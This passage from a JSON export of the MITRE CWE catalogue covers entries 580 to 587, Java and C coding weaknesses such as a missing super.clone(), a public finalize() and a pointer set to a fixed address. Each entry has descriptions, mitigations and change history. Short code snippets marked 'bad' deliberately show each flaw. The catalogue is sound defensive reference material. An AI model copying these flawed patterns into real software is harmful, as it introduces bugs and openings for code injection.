Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"580":{"attr":{"@_ID":"580","@_Name":"clone() Method Without super.clone()","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software contains a clone() method that does not call super.clone() to obtain the new object.","Extended_Description":"All implementations of clone() should obtain the new object by calling super.clone(). If a class does not follow this convention, a subclass\'s clone() method will return an object of the wrong type.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Unexpected State","Quality Degradation"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Call super.clone() within your clone() method, when obtaining a new object."},{"Phase":"Implementation","Description":"In some cases, you can eliminate the clone method altogether and use copy constructors."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following two classes demonstrate a bug introduced by not calling super.clone(). Because of the way Kibitzer implements clone(), FancyKibitzer\'s clone method will return an object of type Kibitzer instead of FancyKibitzer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class Kibitzer {}public class FancyKibitzer extends Kibitzer{}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public Object clone() throws CloneNotSupportedException {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Object returnMe = new Kibitzer();...","xhtml:br":["",""]}}}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public Object clone() throws CloneNotSupportedException {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Object returnMe = super.clone();...","xhtml:br":["",""]}}}}],"xhtml:br":["",""]}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP28","Entry_Name":"Unexpected access points"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Erroneous Clone Method","attr":{"@_Date":"2008-04-11"}}}},"581":{"attr":{"@_ID":"581","@_Name":"Object Model Violation: Just One of Equals and Hashcode Defined","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not maintain equal hashcodes for equal objects.","Extended_Description":"Java objects are expected to obey a number of invariants related to equality. One of these invariants is that equal objects must have equal hashcodes. In other words, if a.equals(b) == true then a.hashCode() == b.hashCode().","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"697","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":"Other","Note":"If this invariant is not upheld, it is likely to cause trouble if objects of this class are stored in a collection. If the objects of the class in question are used as a key in a Hashtable or if they are inserted into a Map or Set, it is critical that equal objects have equal hashcodes."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Both Equals() and Hashcode() should be defined."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MET09-J","Entry_Name":"Classes that define an equals() method must also define a hashCode() method"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Object Model Violation: Just One of Equals and Haschode Defined","attr":{"@_Date":"2008-01-30"}}}},"582":{"attr":{"@_ID":"582","@_Name":"Array Declared Public, Final, and Static","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program declares an array public, final, and static, which is not sufficient to prevent the array\'s contents from being modified.","Extended_Description":"Because arrays are mutable objects, the final constraint requires that the array object itself be assigned only once, but makes no guarantees about the values of the array elements. Since the array is public, a malicious program can change the values stored in the array. As such, in most cases an array declared public, final and static is a bug.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"Mobile code, in this case a Java Applet, is code that is transmitted across a network and executed on a remote machine. Because mobile code developers have little if any control of the environment in which their code will execute, special security concerns become relevant. One of the biggest environmental threats results from the risk that the mobile code will run side-by-side with other, potentially malicious, mobile code. Because all of the popular web browsers execute code from multiple sources together in the same JVM, many of the security guidelines for mobile code are focused on preventing manipulation of your objects\' state and behavior by adversaries who have access to the same virtual machine where your program is running."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Application Data"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"In most situations the array should be made private."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following Java Applet code mistakenly declares an array public, final and static.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public final class urlTool extends Applet {}","xhtml:div":{"#text":"public final static URL[] urls;...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"OBJ10-J","Entry_Name":"Do not use public static nonfinal variables"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":28,"Entry_Name":"Unexpected Access Points"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Background_Details, Demonstrative_Examples, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"}],"Previous_Entry_Name":{"#text":"Mobile Code: Unsafe Array Declaration","attr":{"@_Date":"2008-04-11"}}}},"583":{"attr":{"@_ID":"583","@_Name":"finalize() Method Declared Public","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The program violates secure coding principles for mobile code by declaring a finalize() method public.","Extended_Description":"A program should never call finalize explicitly, except to call super.finalize() inside an implementation of finalize(). In mobile code situations, the otherwise error prone practice of manual garbage collection can become a security threat if an attacker can maliciously invoke a finalize() method because it is declared with public access.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Alter Execution Logic","Execute Unauthorized Code or Commands","Modify Application Data"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"If you are using finalize() as it was designed, there is no reason to declare finalize() with anything other than protected access."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following Java Applet code mistakenly declares a public finalize() method.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public final class urlTool extends Applet {}","xhtml:div":{"#text":"public void finalize() {}...","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":""}}},"Body_Text":"Mobile code, in this case a Java Applet, is code that is transmitted across a network and executed on a remote machine. Because mobile code developers have little if any control of the environment in which their code will execute, special security concerns become relevant. One of the biggest environmental threats results from the risk that the mobile code will run side-by-side with other, potentially malicious, mobile code. Because all of the popular web browsers execute code from multiple sources together in the same JVM, many of the security guidelines for mobile code are focused on preventing manipulation of your objects\' state and behavior by adversaries who have access to the same virtual machine where your program is running."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MET12-J","Entry_Name":"Do not use finalizers"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP28","Entry_Name":"Unexpected access points"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"}],"Previous_Entry_Name":{"#text":"Mobile Code: Public Finalize Method","attr":{"@_Date":"2008-04-11"}}}},"584":{"attr":{"@_ID":"584","@_Name":"Return Inside Finally Block","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code has a return statement inside a finally block, which will cause any thrown exception in the try block to be discarded.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"705","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Alter Execution Logic"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Do not use a return statement inside the finally block. The finally block should have \\"cleanup\\" code."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following code excerpt, the IllegalArgumentException will never be delivered to the caller. The finally block will cause the exception to be discarded.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {}finally {}","xhtml:div":[{"#text":"...throw IllegalArgumentException();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"return r;","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR04-J","Entry_Name":"Do not complete abruptly from a finally block"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR05-J","Entry_Name":"Do not let checked exceptions escape from a finally block"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP6","Entry_Name":"Incorrect Exception Behavior"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"}]}},"585":{"attr":{"@_ID":"585","@_Name":"Empty Synchronized Block","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software contains an empty synchronized block.","Extended_Description":"An empty synchronized block does not actually accomplish any synchronization and may indicate a troubled section of code. An empty synchronized block can occur because code no longer needed within the synchronized block is commented out without removing the synchronized block.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1071","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other","Note":"An empty synchronized block will wait until nobody else is using the synchronizer being specified. While this may be part of the desired behavior, because you haven\'t protected the subsequent code by placing it inside the synchronized block, nothing is stopping somebody else from modifying whatever it was you were waiting for while you run the subsequent code."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"When you come across an empty synchronized statement, or a synchronized statement in which the code has been commented out, try to determine what the original intentions were and whether or not the synchronized block is still necessary."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code attempts to synchronize on an object, but does not execute anything in the synchronized block. This does not actually accomplish anything and may be a sign that a programmer is wrestling with synchronization but has not yet achieved the result they intend.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":"synchronized(this) { }"},{"attr":{"@_Nature":"good"},"xhtml:div":{"#text":"public void setID(int ID){}","xhtml:div":{"#text":"synchronized(this){}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"this.ID = ID;","attr":{"@_style":"margin-left:10px;"}}}}}],"Body_Text":"Instead, in a correct usage, the synchronized statement should contain procedures that access or modify data that is exposed to multiple threads. For example, consider a scenario in which several threads are accessing student records at the same time. The method which sets the student ID to a new value will need to make sure that nobody else is accessing this data at the same time and will require synchronization."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP21","Entry_Name":"Multiple locks/unlocks"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-478"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Other_Notes, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"}]}},"586":{"attr":{"@_ID":"586","@_Name":"Explicit Call to Finalize()","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software makes an explicit call to the finalize() method from outside the finalizer.","Extended_Description":"While the Java Language Specification allows an object\'s finalize() method to be called from outside the finalizer, doing so is usually a bad idea. For example, calling finalize() explicitly means that finalize() will be called more than once: the first time will be the explicit call and the last time will be the call that is made after the object is garbage collected.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1076","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Unexpected State","Quality Degradation"]}},"Potential_Mitigations":{"Mitigation":{"Phase":["Implementation","Testing"],"Description":"Do not make explicit calls to finalize(). Use static analysis tools to spot such instances."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code fragment calls finalize() explicitly:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"widget.finalize();","xhtml:br":["",""],"xhtml:i":"// time to clean up"}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MET12-J","Entry_Name":"Do not use finalizers"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Name, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Explicit Call to Finalize","attr":{"@_Date":"2008-09-09"}}}},"587":{"attr":{"@_ID":"587","@_Name":"Assignment of a Fixed Address to a Pointer","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software sets a pointer to a specific address other than NULL or 0.","Extended_Description":"Using a fixed address is not portable, because that address will probably not be valid in all environments or platforms.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"344","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"758","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Assembly","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"If one executes code at a known location, an attacker might be able to inject code there beforehand."},{"Scope":"Availability","Impact":["DoS: Crash, Exit, or Restart","Reduce Maintainability","Reduce Reliability"],"Note":"If the code is ported to another platform or environment, the pointer is likely to be invalid and cause a crash."},{"Scope":["Confidentiality","Integrity"],"Impact":["Read Memory","Modify Memory"],"Note":"The data at a known pointer location can be easily read or influenced by an attacker."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Never set a pointer to a fixed address."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code assumes a particular function will always be found at a particular address. It assigns a pointer to that address and calls the function.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int (*pt2Function) (float, char, char)=0x08040000;int result2 = (*pt2Function) (12, \'a\', \'b\');","xhtml:br":["","",""],"xhtml:i":"// Here we can inject code to execute."}},"Body_Text":"The same function may not always be found at the same memory address. This could lead to a crash, or an attacker may alter the memory at the expected address, leading to arbitrary code execution."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT36-C","Entry_Name":"Converting a pointer to integer or integer to pointer","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"Software Fault 